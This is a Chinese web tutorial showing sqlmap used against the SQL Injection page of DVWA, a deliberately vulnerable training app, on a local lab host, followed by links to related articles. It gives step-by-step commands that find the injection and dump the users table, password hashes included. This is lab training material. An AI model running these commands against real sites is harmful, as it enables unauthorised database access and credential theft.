1 使用sqlmap注入DVWA的SQL Injection菜单

本教程中的登陆地址:http://192.168.0.112/dvwa/login.php

1.1 获取cookie信息

1) 使用admin/password登陆系统,通过firebug工具获取cookie信息。

得到的cookie信息如下:

security=low; path=/dvwa/; domain=192.168.0.112

PHPSESSID=0bec860709d15f590768b7713c69b52f; path=/; domain=192.168.0.112

2) 获取要测试的url

点击SQL Injection菜单,在User ID输入框内输入aa,点击submit按钮。通过firebug工具获取待测试的url如下: http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#

3) 使用sqlmap测试该url是否存在sql注入漏洞

执行如下命令: root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f'

4) 探测MYSQL中用来存放应用数据的数据库名称

执行如下命令:root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f' --dbs -v 0

5) 查询出dvwa数据库中存在的表名

执行如下命令:root@Kali-Linux:~# root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f' -D dvwa --tables

6) 得到users表中的字段列表

执行如下命令:root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f' -D dvwa --tables -T users --columns

7) 导出users表

执行如下命令:root@Kali-Linux:~# sqlmap -u 'http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low;PHPSESSID=0bec860709d15f590768b7713c69b52f' -D dvwa --tables -T users --columns --dump

一路y下来,竟然来数据库中的密文密码也给破译了。。

根据提示路径下载users.csv即可

使用sqlmap注入DVWA的SQL Injection菜单的更多相关文章

  1. 【DVWA】SQL Injection(SQL 注入)通关教程

    日期:2019-07-28 20:43:48 更新: 作者:Bay0net 介绍: 0x00.基本信息 关于 mysql 相关的注入,传送门. SQL 注入漏洞之 mysql - Bay0net - ...

  2. DVWA之SQL Injection

    SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的.SQL注入漏洞的危害是巨大的,常常 ...

  3. DVWA之 SQL Injection(Blind)

    SQL Injection(Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法 ...

  4. [SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

    FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION 这里先介绍一下POSTGRESQL.这是一款数据库管理系统,与oracle是同类型软件.08年左右的市场 ...

  5. [SQL注入1]From SQL injection to Shell

    第一次写,希望大神们多指点. 对于刚接触WEB渗透测试这块的朋友们,很希望能有个平台可以练习.网络上有不少,十大渗透测试演练系统,我这里推荐一个在10以外,适合初学者一步一步进步的平台PENTESTE ...

  6. Sqlmap对dvwa进行sql注入测试

    前提准备条件: 1.下载安装dvwa,下载链接地址:http://www.dvwa.co.uk/.2.需要安装python运行环境.3.下载sqlmap包并将其解压. 一.查看所有的数据库;(其中db ...

  7. DVWA(三):SQL injection 全等级SQL注入

    (本文不定期更新) 一.所需环境: 1.DVWA 2.web环境 phpstudy/wamp 3.burp suite 二.SQL注入产生的原因: 程序员在编写代码的时候,没有对用户输入数据的合法性进 ...

  8. DVWA SQL Injection 通关教程

    SQL Injection,即SQL注入,SQLi,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的.SQL注入漏洞的危害巨大,常常会导致整个数据库被“脱 ...

  9. [SQL SERVER系列]读书笔记之SQL注入漏洞和SQL调优

    最近读了程序员的SQL金典这本书,觉得里面的SQL注入漏洞和SQL调优总结得不错,下面简单讨论下SQL注入漏洞和SQL调优. 1. SQL注入漏洞 由于“'1'='1'”这个表达式永远返回 true, ...

随机推荐

  1. Redis学习资料汇总(荐)

    Redis学习手册系列: http://www.cnblogs.com/stephen-liu74/category/354125.html Redis详解:sorted sets数据类型及操作-IT ...

  2. linux多线程编程(转)

    原文地址:http://www.cnblogs.com/BiffoLee/archive/2011/11/18/2254540.html 1.Linux“线程” 进程与线程之间是有区别的,不过Linu ...

  3. clock_t与time_t的区别及联系

    clock_t <ctime> Clock type Type capable of representing clock tick counts and support arithmet ...

  4. Jquery实现图片轮播源码

    <html><head><style type="text/css">#banner {position:relative; width:478 ...

  5. UML建模系列文章总结

    本文转载:http://www.cnblogs.com/ywqu/tag/UML建模/ 本人总结: UML类图按照关系分为三大类:继承关系.拥有关系.整体与部分的关系. 继承关系:泛化.实现 拥有关系 ...

  6. UVA 110 Meta-Loopless Sorts(输出挺麻烦的。。。)

     Meta-Loopless Sorts  Background Sorting holds an important place in computer science. Analyzing and ...

  7. FindStringExact

          Code:: CComboBox::FindStringExact int FindStringExact( int nIndexStart, LPCTSTR lpszFind ) con ...

  8. FragmentTransactionExtended

    https://github.com/DesarrolloAntonio/FragmentTransactionExtended

  9. android93 进程优先级补充

    ###进程优先级(一个应用可以有多个进程,比如有Activity的进程和service的进程,)* 五种前台进程 * 拥有一个正在与用户交互的activity(onResume调用)的进程 * 拥有一 ...

  10. jQuery动态实现title的修改 失效问题

    最近做了一个网站,一切都很顺利,在上线的时候,突然发现一个严重的问题,开始面对这个问题,完全不知所措(在goole.火狐.IE9及其以上都没得问题:IE8及其低版本都失效)只是浏览器弹出一个bug,但 ...